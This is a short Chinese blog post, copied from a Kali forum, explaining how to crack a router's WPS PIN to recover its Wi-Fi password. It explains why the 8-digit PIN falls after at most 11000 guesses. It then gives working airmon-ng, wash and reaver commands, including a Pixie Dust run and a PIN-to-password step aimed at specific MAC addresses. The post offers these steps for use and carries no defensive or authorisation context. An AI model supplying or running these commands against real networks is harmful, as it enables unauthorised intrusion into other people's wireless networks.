原理

PIN码是由8位纯数字组成的识别码，Pin码破解分三部分进行

前4位为第一部分，第5-7位为第二部分，最后1位为第三部分。

• 第一部分的验证跟第二部分没关联，最后1位是根据第二部分计算得出的校验码。
• 破解一开始是先单独对第一部分进行pin码匹配，也就是说先破解前4位pin码。前4位是0000-9999总共10000个组合。
• 当前4位pin码确定后再对第二部分进行pin码匹配，也就是再对5-7位进行破解，5-7位是000-999总共1000个组合。前7位都确定后，最后1位也会自动得出，破解完成。
• 根据pin码破解的原理，可以看到只需要枚举11000种情况就会必然破解出pin码，从而通过pin得到wifi密码。

网卡监控模式

airmon-ng start wlan0

wash -i wlan0mon

                        网卡                   物理地址                 信道
reaver -i wlan0mon -b 00:5A:13:40:AA:F8 -c 11 -vv -K 0

通过PIN获得WLAN密码

                       网卡                    物理地址                      pin码
reaver -i wlan0mon -b 78:A1:06:B6:2A:42 -p 92975934

PS：本文章搬运源自Kali中文论坛，https://bushizhu.com/10457.html

因为家里路由器不带PIN，所以搬运一下，后面有机会测试教程。

另一篇文章https://www.likecs.com/show-657149.html